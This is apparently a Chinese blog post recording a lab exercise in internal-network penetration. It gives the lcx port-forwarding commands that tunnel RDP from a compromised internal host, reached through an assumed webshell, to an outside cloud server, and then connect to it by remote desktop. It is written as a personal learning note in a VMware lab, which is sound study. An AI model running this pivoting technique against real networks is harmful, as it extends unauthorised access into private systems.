0x01 前言

這周開始準(zhǔn)備學(xué)習(xí)內(nèi)網(wǎng)滲透的知識(shí)，昨天利用Vmware搭建了域環(huán)境，今天做了一個(gè)小實(shí)驗(yàn)，利用lcx端口轉(zhuǎn)發(fā)來訪問內(nèi)網(wǎng)服務(wù)器。這里需要一個(gè)外網(wǎng)ip，所以去阿里云買了一個(gè)服務(wù)器，學(xué)生價(jià)9.9一個(gè)月還是挺不錯(cuò)的~

0x02 操作環(huán)境

內(nèi)網(wǎng)服務(wù)器ip：192.168.80.3 端口3389
外網(wǎng)ip：x.x.x.x 端口：51（這里需要注意的是購(gòu)買阿里云服務(wù)器之后一定要在安全組里定義一個(gè)開放入口的端口，否則的話是連接不到的，我就被坑了很久。。）

0x03 具體步驟

首先這里假設(shè)已經(jīng)拿到了服務(wù)器的webshell了，那么就上傳一個(gè)lcx.exe到肉雞上，在終端輸入

lcx.exe -slave x.x.x.x 51 192.168.80.3 3389

這里意思就是將內(nèi)網(wǎng)192.168.80.3的3389端口轉(zhuǎn)發(fā)到外網(wǎng)x.x.x.x的51端口

然后再本機(jī)上（注意這里本機(jī)需要外網(wǎng)ip，否則會(huì)失敗）的終端輸入

lcx.exe -listen 51 10000

這里意思是在本機(jī)上監(jiān)聽51端口并連接到10000端口（可以用別的端口）
本機(jī)需要10000端口是沒有被其他程序使用的，可以使用命令：

netstat -an

查看

最后win+R，輸入mstsc打開遠(yuǎn)程桌面，輸入127.0.0.1:10000就可以連接到肉雞了~~

P.S 要有一個(gè)需要注意的是，做實(shí)驗(yàn)的時(shí)候，肉雞記得把遠(yuǎn)程桌面功能打開呀！

0x04 參考文獻(xiàn)

http://www.freebuf.com/sectool/126967.html